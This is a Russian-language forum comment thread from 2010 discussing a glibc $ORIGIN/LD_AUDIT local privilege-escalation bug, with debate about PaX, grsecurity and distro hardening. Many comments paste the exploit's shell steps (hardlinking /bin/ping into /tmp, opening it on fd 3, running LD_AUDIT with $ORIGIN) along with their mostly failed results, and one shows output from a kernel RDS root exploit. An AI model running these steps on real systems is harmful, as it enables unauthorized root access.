|
2.7, follow_me (?), 15:37, 19/10/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
Покажи свой IP и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)
| |
|
3.10, arcade (ok), 15:40, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Покажи свой IP и ты узнаешь как страшно , вернее ты
> и не заметишь как всё закончится ;)
Я не замечу. У меня фря и зфс, и такие глупости как один раздел под все файлы я давно изжил. А в разделах в которые пользователь умеет писать нет suid файлов.
Хотя отношение разрабов не радует, давно такая бага в ядре и никто не зопатчил...
| |
|
4.13, User294 (ok), 15:48, 19/10/2010 [^] [^^] [^^^] [ответить]
| +16 +/– |
> давно такая бага в ядре и никто не зопатчил...
Epic, epic, epic fail!
Hint #1: может быть, вам следует для начала научиться отличать ядро от glibc, а уже потом умничать начинать? :)
Hint #2: в природе, кстати, есть более чем одна реализация libc. И ряд линухов пользуется ими. Потому что ядро и либцэ - "немного" разные вещи.
| |
4.14, paxuser (?), 15:54, 19/10/2010 [^] [^^] [^^^] [ответить]
| –10 +/– |
Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD, то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и тем более от OpenBSD. Даже ванильный линукс дальше ушёл (но при этом качество кода ядра у него на уровне второй половины 90-ых - хуже, чем у любой из первой тройки *BSD).
| |
|
5.22, butcher (ok), 16:15, 19/10/2010 [^] [^^] [^^^] [ответить]
| +3 +/– |
> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
> тем более от OpenBSD.
Обоснуете? Или так, ваше личное мнение?
| |
|
6.33, paxuser (?), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]
| +6 +/– |
>> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
>> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
>> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
>> тем более от OpenBSD.
> Обоснуете? Или так, ваше личное мнение?
Конечно обосную. Во FreeBSD не ни аналогов W^X, ни ASLR, ни PIE, даже возмоность сборки с SSP добавили лишь недавно. В том же CentOS всё это в той или иной мере есть (для юзерспейса). В ванильном линуксе уже реализован аналог W^X, ASLR, поддержка PIE и защита от маппинга памяти по нулевому адресу (с 2008 г.). Не говоря уже о PaX и Grsecurity, где на данный момент реализованы защиты ядра от классов уязвимостей для нескольких аппаратных архитектур, включая аналог W^X для юзерспецса (KERNEXEC), защиту от обращения по указателям на юзерспейс (UDEREF), проверки границ данных при копировании из юзерспейса в ядро (USERCOPY) и т.д.. С полным списком можете ознакомиться сами на grsecurity.net и pax.grsecurity.net + помощь в конфигураторе ядра с PaX и Grsecurity. Датировка первых реализаций PaX - 2001-2002 г. (точнее не вспомню), Grsecurity - 2003-ий год, начала аудита кода ядра и юзерспейса в OpenBSD - 96-ой год, начала включения ProPolice (SSP) - если не ошибаюсь, то 2001-ый год. В 2004-ом году (в сети есть слайды с презентации) в OpenBSD уже были W^X, аналог SSP, StackGhost (продвинутый аналог SSP для Sparc) и ASLR, в 2007-2008 г. была реализована поддержка PIE, в 2009-ом - запрет на памминг нулевого адреса. За NetBSD я не слежу, но пару-тройку лет назад они начали портировать что-то из PaX - гугль в помощь.
| |
|
7.100, BigHo (?), 23:07, 19/10/2010 [^] [^^] [^^^] [ответить] | +4 +/– | W X - технология, основанная на Х-бит Если так, то она есть - ею можно пользов... большой текст свёрнут, показать | |
|
|
9.111, BigHo (?), 01:03, 20/10/2010 [^] [^^] [^^^] [ответить] | +/– | В смысле тот, который nX AMD Xd INTEL Как его не назови, а суть одна Без его... большой текст свёрнут, показать | |
|
|
11.120, BigHo (?), 03:19, 20/10/2010 [^] [^^] [^^^] [ответить] | +/– | Не в курсе был про такое поведение OpenBSD Видимо серьезный тон задает фон кате... большой текст свёрнут, показать | |
|
|
|
8.106, paxuser (?), 00:17, 20/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | Возможно, в последних версиях FreeBSD действительно появился аналог W X, но я об... большой текст свёрнут, показать | |
|
9.119, BigHo (?), 02:35, 20/10/2010 [^] [^^] [^^^] [ответить] | +/– | Про то и речь Только с уточнением результата - для AMD64 нормально работает В ... большой текст свёрнут, показать | |
|
10.121, paxuser (?), 03:58, 20/10/2010 [^] [^^] [^^^] [ответить] | +2 +/– | gt оверквотинг удален Да нет там никаких принципиальных различий, разница по с... большой текст свёрнут, показать | |
|
11.196, taaroa (ok), 13:14, 24/10/2010 [^] [^^] [^^^] [ответить] | +/– | Позвольте Вас дополнить и поправить Slo-Tech Could you please describe in few ... большой текст свёрнут, показать | |
|
|
|
|
|
|
5.23, mma (?), 16:16, 19/10/2010 [^] [^^] [^^^] [ответить]
| –3 +/– |
Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в основном как пакетогонялка, как дескто или интерактивные сервися ее мало
2)каковы критерии оценки качества кода ядер?
| |
|
6.37, paxuser (?), 16:46, 19/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
> 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в
> основном как пакетогонялка, как дескто или интерактивные сервися ее мало
Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать универсальное применение, а не частные случаи.
> 2)каковы критерии оценки качества кода ядер?
Субъективно-эмпирические, с оглядкой на сложность кода с опубликованными уязвимостями (на сколько просто/сложно было не допустить ошибку, приведшую к уязвимости).
| |
|
7.39, тигар (ok), 16:54, 19/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>> Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
>> 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в
>> основном как пакетогонялка, как дескто или интерактивные сервися ее мало
> Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым
> атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать
> универсальное применение, а не частные случаи.
всеже хотелось бы увидеть пример при помощи которого я удаленно подниму свои привилегии до супер-пользователя, об этом же речь, да?
| |
|
8.41, paxuser (?), 16:59, 19/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | Нет, не об этом речь Но если взломщик заполучил права обычного пользователя и з... текст свёрнут, показать | |
|
9.43, тигар (ok), 17:02, 19/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | дак а fbsd причем или в линаксах еще где-то между вышеописанными шагами чтение... текст свёрнут, показать | |
|
|
11.48, тигар (ok), 17:20, 19/10/2010 [^] [^^] [^^^] [ответить] | +/– | я пытаюсь понять зачем Вы пишете наборы фраз то PaX и Grsecurity то Она не то... большой текст свёрнут, показать | |
|
12.53, paxuser (?), 17:26, 19/10/2010 [^] [^^] [^^^] [ответить] | +/– | Нет, вы просто хамите и либо не желаете понять, либо не обладаете даже базовым п... большой текст свёрнут, показать | |
|
13.58, тигар (ok), 17:45, 19/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | знаете меня больше практика интересует Есть примеры Где посмотреть статисти... текст свёрнут, показать | |
|
|
15.92, тигар (ok), 22:12, 19/10/2010 [^] [^^] [^^^] [ответить] | +/– | погодите, если я понял правильно то Вы предлагаете мне самому доказать Ваши голо... большой текст свёрнут, показать | |
|
|
|
14.75, paxuser (?), 19:14, 19/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | Не верю, а знаю Любые, которые обрабатывают данные из внешних, потенциально опа... большой текст свёрнут, показать | |
|
|
|
|
|
|
|
|
|
5.129, QuAzI (ok), 11:17, 20/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | Почему к сожалению Что до FreeBSD, давеча писали про http www opennet ru o... большой текст свёрнут, показать | |
|
|
7.153, QuAzI (ok), 16:38, 20/10/2010 [^] [^^] [^^^] [ответить] | +/– | Почему на второй машине не проявилась на дырявом же ProFTPd Извините, вы выше ... большой текст свёрнут, показать | |
|
8.156, paxuser (?), 16:57, 20/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | А я откуда знаю Но уж точно не потому, что между креслом и монитором находитесь... большой текст свёрнут, показать | |
|
9.171, QuAzI (ok), 23:00, 20/10/2010 [^] [^^] [^^^] [ответить] | –2 +/– | Неа, бессовестно хамите тут как раз Вы, но очень уж уверены что именно Вы самый ... большой текст свёрнут, показать | |
|
|
|
|
13.177, QuAzI (ok), 01:27, 21/10/2010 [^] [^^] [^^^] [ответить] | +/– | _орали_ - а как ещё назвать тучу постов выше _давайте, расхвалите мне её тут_- ... большой текст свёрнут, показать | |
|
|
|
|
|
|
|
|
|
|
3.19, Аноним (-), 16:08, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
>позволяющая любому _локальному_ пользователю получить привилегии суперпользователя
вот так
| |
3.51, ы (?), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
>Покажи свой IP и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)
Сетка класса А: 127.0.0.0/8, выбери любой из 16'777'214 айпишников.
| |
|
|
1.5, V (??), 15:33, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
Connection to board-gw closed.
не судьба..
| |
|
2.25, h4tr3d (ok), 16:24, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
Аналогично, это в консольке, xterm просто закрылся. может shell тоже имеет значение?
| |
|
3.32, Rain (??), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
Нет, перенаправь вывод ошибок в файл и увидишь то же самое
| |
|
4.151, User294 (ok), 15:49, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Нет, перенаправь вывод ошибок в файл и увидишь то же самое
Можно просто шелл в шелле запустить. Когда чайлдовый шелл помрет, вы вывалитесь в парент, сообщение о том почему сдох чайлд ессно будет видно. ИМХО так проще - ошибка вываливается в том же месте, не надо ни в каких файлах копаться где-то сбоку.
| |
|
|
|
1.6, Аноним (-), 15:36, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
на шаге
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
шелл упал
дистр OpenSUSE 11.3
| |
|
2.83, killer1804 (??), 20:12, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
[user0@homelinux ~]$ uname -a
Linux homelinux 2.6.35-ARCH ....
шел упал. аналогично
| |
|
1.8, Egres (ok), 15:38, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется
Ubuntu 10.10, /tmp не является отдельной fs
| |
|
2.49, tallman (?), 17:24, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
и в логе такая штука
$ tail -1 /var/log/messages
Oct 19 16:17:21 machine kernel: [226597.124722] non-accessible hardlink creation was attempted by: ln (fsuid 1000)
Даже как-то скучно быть неподверженным..
| |
|
1.9, paxuser (?), 15:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Кстати, в Grsecurity по умолчанию включены запреты пользователям на создание хардлинков на чужие файлы.
| |
1.12, bircoph (?), 15:46, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid файлы.
Так что эксплойт не работает и я в безопасности )).
| |
|
2.15, paxuser (?), 15:57, 19/10/2010 [^] [^^] [^^^] [ответить]
| –2 +/– |
> В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid
> файлы.
> Так что эксплойт не работает и я в безопасности )).
У вас в Gentoo месяцами обновления безопасности не выпускаются - посмотрите хотя бы на даты в ChangeLog MySQL в основном дереве Portage. Уровень защищённости приемлемый только в полноценном Hardened.
| |
|
|
4.24, paxuser (?), 16:20, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> emerge --sync по чаще делай
Между прочим, emerge --sync подвержен MitM-атакам. Давно перешёл на emerge-webrsync вкупе с webrsync-gpg FEATURE. Нахамить-то любой может, вы для начала попробуйте осилить анализ содержимого /usr/portage/dev-db/mysql/ChangeLog с датой публикации бюллитеней безопасности и выходом исправленных версий MySQL.
| |
|
|
6.143, paxuser (?), 14:36, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Паранойя головного мозга во все поля.
Блажен, кто верует, знание же преумножает скорбь. :)
| |
|
|
|
3.34, bircoph (?), 16:43, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
Я mysql не пользуюсь, так что меня это не волнует. GLSA по критическим уязвимостям быстро выходят.
| |
|
4.38, paxuser (?), 16:49, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Я mysql не пользуюсь, так что меня это не волнует. GLSA по
> критическим уязвимостям быстро выходят.
О скорости выхода GLSA - это вы на #gentoo-security расскажите, чтобы разработчики тоже порадовались: проблема-то надуманная, оказывается.
| |
|
|
|
1.18, Аноним (-), 16:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
на третьем шаге уже не дает
$ exec 3 < /tmp/exploit/target
bash: /tmp/exploit/target: Отказано в доступе
| |
|
2.21, Вова (?), 16:12, 19/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
> на третьем шаге уже не дает
> $ exec 3 < /tmp/exploit/target
> bash: /tmp/exploit/target: Отказано в доступе
+1, на двух гентах пытался, дома и на работе
| |
|
3.82, ozs (ok), 20:02, 19/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
****@***:~$ mkdir /tmp/exploit
****@***:~$ ln /bin/ping /tmp/exploit/target
****@***:~$ exec 3< /tmp/exploit/target
bash: /tmp/exploit/target: Отказано в доступе
На Slackware 13.1
| |
|
4.96, Ytch (?), 22:37, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
По умолчанию на Zenwalk 6.4 аналогично.
Если на /bin/ping рутом дать права на чтение и проделать все еще раз, то закрывается терминал как писали выше.
| |
|
|
|
1.26, svchost (ok), 16:29, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| –2 +/– |
Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.
Сильно не пинайте, но иногда такие мысли возникают.
| |
|
2.31, Аноним (-), 16:38, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.
Сильно не пинайте, но иногда такие мысли возникают.
В ХР необходимости не было получать такой доступ. Зловреды и так работали. Поэтому никто и не интересовался.
| |
2.59, User294 (ok), 17:55, 19/10/2010 [^] [^^] [^^^] [ответить] | +1 +/– | Господи, что вы там курите если не понимаете разницы между ядром и либой привиле... большой текст свёрнут, показать | |
|
3.93, User294 (ok), 22:26, 19/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
А это вообще лулзов пачка :). Более того - была еще фича: предложить юзеру скачать DLL :).А потом ... потом когда юзер ее скачает, при старте фурифокса она поюзается *до* системной библы с таким же именем. При чем дыра была специфичная для винды почему-то. Видимо остальные системы не настолько "умны" чтобы на свой зад искать и грузить либы откуда попало (current directory?).
P.S. алсо, говорят что stuxnet пробивает винду от просто факта втыкания флехи. Какая-то дыра в обработке ярлыков, чтоли. Прямо так, без старта программы авторана даже, просто воткнули - и вас поимели. Что-то из этого вроде даже до сих пор не запатчено если меня не подводит склероз по части секурити уведомлений. Читайте сайты по секурити в общем - узнаете много нового. Спокойно спать перестанете заодно :)
| |
|
4.133, Добрый Аноним (?), 11:53, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> А это вообще лулзов пачка :). Более того - была еще фича:
> предложить юзеру скачать DLL :).А потом ... потом когда юзер ее
> скачает, при старте фурифокса она поюзается *до* системной библы с таким
> же именем. При чем дыра была специфичная для винды почему-то. Видимо
> остальные системы не настолько "умны" чтобы на свой зад искать и
> грузить либы откуда попало (current directory?).
ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать что та же дыра и в лунухах имеет(ла) место быть.
| |
|
5.137, Зилибоба (ok), 13:42, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
>> А это вообще лулзов пачка :). Более того - была еще фича:
>> предложить юзеру скачать DLL :).А потом ... потом когда юзер ее
>> скачает, при старте фурифокса она поюзается *до* системной библы с таким
>> же именем. При чем дыра была специфичная для винды почему-то. Видимо
>> остальные системы не настолько "умны" чтобы на свой зад искать и
>> грузить либы откуда попало (current directory?).
> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
> что та же дыра и в лунухах имеет(ла) место быть.
Во первых - была, а во вторых, пруф давайте.
| |
5.139, paxuser (?), 14:15, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
> что та же дыра и в лунухах имеет(ла) место быть.
Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал".
| |
|
6.145, Добрый Аноним (?), 14:40, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
>> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
>> что та же дыра и в лунухах имеет(ла) место быть.
> Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал".
да какая разница? главное, что это проблема не только вин система, как некоторые тут утверждают.
| |
|
|
|
|
|
1.27, Аноним (-), 16:31, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
Особенно порадовало отношение разработчиков glibc..
бага есть? - ну есть, ну и нафик - не будем ее фиксить, не сломают.
А если сломают? - тогда и пофиксим.
Чем-то это напоминает отношение MS к выпуску обновлений.
Не ужели FSF не может нормально следить за ключевым проектом?
| |
1.29, savant (ok), 16:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Arch, при выполнении LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл просто падает
| |
1.40, aNoN (?), 16:58, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
В funtoo тоже suid бит для хардлинка не выставляется, поэтому не работает. В debiane - лехко, но падает шелл.
| |
|
|
3.69, Sylvia (ok), 18:46, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
и несмотря на то, что eglibc всего лишь форк от glibc,
в eglibc ( 2.11.2 ) эксплоит не работает.
| |
|
|
1.42, Аноним (-), 17:01, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
~ $ mkdir /tmp/exploit
~ $ ln /bin/ping /tmp/exploit/target
~ $ exec 3< /tmp/exploit/target
-bash: /tmp/exploit/target: Отказано в доступе
gentoo ~x86_64
| |
|
2.71, Sylvia (ok), 18:56, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
suid бинарник на который делается линк должен быть читаемым
mode 4755 например, если он нечитаем, но выполним, то exec 3 не пройдет.
| |
|
1.44, User294 (ok), 17:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А "презренные бубунты" этот сплойт не пробирает. Посему странно ждать исправления для них - а они походу не эксплойтабельны и так?! Какой редхатчик новость писал? Он был не в курсе что в убунте/дебияне юзается другая либа - eglibc? Или какого буя про исправления написано? Пусть автор новости объяснит свою логику наведения паники? oO
В бубунтах шелл просто убивается с assertion failed. И фигъ мне а не рут, соответственно. Так что приветы крЮтому редхату и Ульриху. Энтерпрайзнички, а на стандарт вот забили :-).
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
| |
|
2.56, anonymous (??), 17:31, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
>другая либа - eglibc
Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC) that is designed to work well on embedded systems.
| |
|
3.61, User294 (ok), 18:19, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC)
> that is designed to work well on embedded systems.
Спасибо, Кэп. Но это не отменяет факта что приведенный эксплойт работает только на редхатах, но не катит в дебиянообразных. Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.
| |
|
4.162, solardiz (ok), 17:41, 20/10/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.
Да, ошибаешься. Тут дело не в glibc vs. eglibc, а в опциях сборки. -DNDEBUG убирает assert'ы, которые, в теории, на уже отлаженном коде не нужны. А реально - в данном случае помогали. То, что срабатывает assert внутри glibc/eglibc - это признак наличия бага - так что исправление для Debian и Ubuntu должно появиться. Возможно, оно не будет считаться security fix'ом, хотя уверенности в том что assert'а было достаточно, чтобы спастись от всех способов атаки, нет.
А вот Owl и ALT Linux этой проблеме не подвержены по другим причинам. :-)
| |
|
|
|
1.47, Аноним (-), 17:19, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
$ LD_AUDIT="\$ORIGIN" exec /proc/$$/fd/3
bash: /proc/30974/fd/3: Permission denied
bash: exec: /proc/30974/fd/3: cannot execute: Success
$
хз... видимо я так давно не обновлялся, что LD_AUDIT у меня не поддерживается =))
| |
|
2.52, Аноним (-), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
а, нет, вру, дескриптор перепутал, assert срабатывает:
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
| |
|
1.50, Аноним (-), 17:24, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
| |
1.54, прххффф (?), 17:30, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
На Debian не работает. Вывод: RedHat дырявый :-)
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
| |
1.57, Аноним (-), 17:39, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
в ubuntu 10.10:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется
| |
|
2.80, Sylvia (ok), 19:37, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
жесткую ссылку можно сделать в пределах 1 устройства, у вас наверное /tmp и /bin на разных партициях/устройствах
| |
|
3.84, val (??), 20:32, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
у меня тоже ubuntu 10.10. tmp и bin на одном разделе. то же самое выдает.
| |
|
|
1.64, Vasily Pupkin (?), 18:34, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] ==
| |
|
2.70, Аноним (-), 18:53, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
пробовали не работает
bash: line 28: /tmp/exploit/traget: No such file or directory
| |
|
3.76, Аноним2 (?), 19:15, 19/10/2010 [^] [^^] [^^^] [ответить] | +/– | Что-то вы не то делаете видимо, но и у меня не получается Это как раз способ дл... большой текст свёрнут, показать | |
|
4.90, ozs (ok), 21:55, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>>$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &
[1] 5559
А что вот это [1] 5559 , у меня пишет такая команда не найдена.
| |
|
5.99, User294 (ok), 23:06, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> А что вот это [1] 5559 , у меня пишет такая команда не найдена.
Это? Это - стопроцентный EPIC FAIL! :))))
Хинт: ввести выданные шеллом номер job и его pid как команду - круто придумано. Вы б думали что вводите, а? Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.
| |
|
6.116, ozs (ok), 02:11, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
Спасибо
>>Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.
От этого никто не застрахован.
| |
|
|
|
|
2.74, Sylvia (ok), 19:08, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
sylvia@evy /var/tmp $ pkill -n -t $(tty | sed 's#/dev/##') sleep
-bash: line 3: 18668 Terminated sleep 1h
sylvia@evy /var/tmp $ warning: debug option 'nonsense' unknown; try LD_DEBUG=help
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
с eglibc 2.11.2 со вторым способом также срабатывает ассерт
| |
2.78, AX (?), 19:21, 19/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> В основной ссылке по новости есть второй метод атаки
> http://seclists.org/fulldisclosure/2010/Oct/257
После выполнения pkill:
warning: debug option 'nonsense' unknown; try LD_DEBUG=help
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
> Там ссылки делать не придется.
(head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1)
В первой же строке запуск всё той же ссылки на ping.
| |
|
1.67, Vasily Pupkin (?), 18:41, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
У меня вообще ни на одной машине не получилось заэксплуатировать.
1. У меня всё с SUID на отдельных разделах
2. Всё с suid только на 111
3. Даже когда я это всё пофиксил, всё равно вываливается ассёрт :]
| |
1.89, Добрый Аноним (?), 21:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
Вот, а кто-то мне тут рассказывал, что в линухах держать все на одном разделе можно спокойно, там людей не тревожат переполнения разделов, опции монтирования, а теперь не тревожат еще и всякие уязвимости....
О безопасности думать надо, да.
| |
1.91, i (??), 22:02, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
чето облом на 2й же команде
ln /bin/ping /tmp/exploit/target
ln: создание жесткой ссылки «/tmp/exploit/target» => «/bin/ping»: Неверная ссылка между устройствами
ладно создал в /home но опять же:
ls -l /proc/$$/fd/3
ls: невозможно получить доступ к /proc/18810/fd/3: Нет такого файла или каталога
glibc-2.11.2
| |
1.97, balex (??), 22:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Опять этот SUID... Ну и как всегда о сто и одном способе "как получить линукс с правами обычного пользователя" тут не поведали. Те же юзеры, которые работают в удалённых xnix окружениях наверное и так бояться что-нить "уронить", конечно без дятлов никуда...
| |
1.103, Аноним (-), 00:06, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
andrey@evilhorse /var/run/exploit $ ls -ld .
drwxrwxrwx 2 andrey andrey 4096 Окт 19 23:03 .
andrey@evilhorse /var/run/exploit $ ln /bin/ping /var/run/exploit/target
andrey@evilhorse /var/run/exploit $ ls -l
итого 28
-rws--x--x 2 root root 26508 Авг 18 2008 target
andrey@evilhorse /var/run/exploit $ exec 3< /var/run/exploit/target
bash: /var/run/exploit/target: Отказано в доступе
andrey@evilhorse /var/run/exploit $
не работает
| |
|
2.105, Аноним (-), 00:13, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
если пофиксить права на /bin/ping:
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
и падение
| |
|
1.113, Аноним (-), 01:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
тестовая система, собранна из исходников
./configure && make && make install
, ни каких патчей безопасности - тот же ".. Assertion .."
| |
1.115, ifel (??), 02:08, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
CO5 i386/x86_64 - пашет на ура
CO4 - не работает
На CO5 мы уже собрали rpms patched и разлили по серверам.
| |
|
2.126, killer1804 (??), 08:35, 20/10/2010 [^] [^^] [^^^] [ответить]
| +/– |
> мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0
> на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC
> 2010 i686 i686 i386 GNU/Linux
[user0@video_srv ~]$ ./expl.bin
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved cap_ptrace_traceme to 0xc1149490
[+] Resolved commit_creds to 0xc1060fe0
[+] Resolved prepare_kernel_cred to 0xc1060db0
[*] Failed to resolve kernel symbols.
[user0@video_srv ~]$
[user0@video_srv ~]$ uname -a
